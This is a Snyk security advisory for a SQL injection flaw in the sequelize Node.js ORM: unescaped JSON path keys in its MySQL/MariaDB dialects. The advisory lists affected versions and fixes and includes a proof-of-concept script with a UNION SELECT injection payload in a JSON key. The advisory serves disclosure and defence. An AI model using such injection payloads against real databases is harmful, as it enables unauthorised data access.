SQL Injection Affecting sequelize package, versions >=3.0.0 <3.35.1 >=4.0.0 <4.44.3 >=5.0.0-0 <5.8.11


0.0
high

Snyk CVSS

    Attack Complexity Low

    Threat Intelligence

    Exploit Maturity Proof of concept
    EPSS 0.19% (56th percentile)
Expand this section
NVD
9.8 critical

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-JS-SEQUELIZE-450221
  • published 21 Jun 2019
  • disclosed 20 Jun 2019
  • credit Snyk Security Team

How to fix?

Upgrade sequelize to version 3.35.1, 4.44.3, 5.8.11 or higher.

Overview

sequelize is a promise-based Node.js ORM for Postgres, MySQL, MariaDB, SQLite and Microsoft SQL Server.

Affected versions of this package are vulnerable to SQL Injection due to JSON path keys not being properly escaped for the MySQL/MariaDB dialects.

PoC by Snyk

const Sequelize = require('sequelize');
const sequelize = new Sequelize('mysql', 'root', 'root', {
  host: 'localhost',
  port: '3306',
  dialect: 'mariadb',
});

class Project extends Sequelize.Model {}

Project.init({
  name: Sequelize.STRING,
  target: Sequelize.JSON,
}, {
  sequelize,
  tableName: 'projects',
});

(async () => {
  await sequelize.sync();

  console.log(await Project.findAll({
    where: {target: {"a')) AS DECIMAL) = 1 UNION SELECT VERSION(); -- ": 1}},
    attributes: ['name'],
    raw: true,
  }));
})();

// https://github.com/sequelize/sequelize/blob/master/lib/dialects/abstract/query-generator.js#L1059-L1061
// case 'mariadb':
//   pathStr = ['$'].concat(paths).join('.');
//   return `json_unquote(json_extract(${quotedColumn},'${pathStr}'))`;